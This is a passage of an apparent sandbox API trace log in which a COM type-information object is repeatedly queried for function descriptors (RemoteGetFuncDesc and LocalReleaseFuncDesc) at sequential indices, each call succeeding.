pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5c, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5d, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5e, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5f, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x60, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x61, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x62, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x63, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x64, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x65, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x66, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x67, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x68, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x69, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6a, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6b, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6c, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6d, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6e, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6f, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x70, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x71, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x72, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x73, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x74, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x75, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.850] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.850] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x76, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x77, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x78, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x79, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7a, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7b, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7c, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7d, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7e, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7f, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x80, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x81, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x82, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x83, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x84, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x85, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x86, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.851] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.851] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x87, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x88, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x89, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8a, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8b, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8c, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8d, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8e, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8f, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x90, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x91, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x92, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x93, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x94, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x95, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x96, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x97, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.852] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x98, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.852] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x99, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9a, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9b, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9c, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9d, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9e, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9f, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa0, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa1, ppFuncDesc=0x147248, pDummy=0xe0 | out: ppFuncDesc=0x147248, pDummy=0xe0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa2, ppFuncDesc=0x147248, pDummy=0x1800 | out: ppFuncDesc=0x147248, pDummy=0x1800) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa3, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa4, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa5, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa6, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa7, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa8, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.853] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa9, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.853] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xaa, ppFuncDesc=0x147248, pDummy=0x1800 | out: ppFuncDesc=0x147248, pDummy=0x1800) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xab, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xac, ppFuncDesc=0x147248, pDummy=0x1800 | out: ppFuncDesc=0x147248, pDummy=0x1800) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xad, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xae, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xaf, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb0, ppFuncDesc=0x147248, pDummy=0x1800 | out: ppFuncDesc=0x147248, pDummy=0x1800) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb1, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb2, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb3, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb4, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb5, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb6, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb7, ppFuncDesc=0x147248, pDummy=0xe0 | out: ppFuncDesc=0x147248, pDummy=0xe0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb8, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb9, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xba, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.854] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.854] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbb, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbc, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbd, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbe, ppFuncDesc=0x147248, pDummy=0x1800 | out: ppFuncDesc=0x147248, pDummy=0x1800) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbf, ppFuncDesc=0x147248, pDummy=0x1800 | out: ppFuncDesc=0x147248, pDummy=0x1800) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc0, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc1, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc2, ppFuncDesc=0x147248, pDummy=0x1800 | out: ppFuncDesc=0x147248, pDummy=0x1800) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc3, 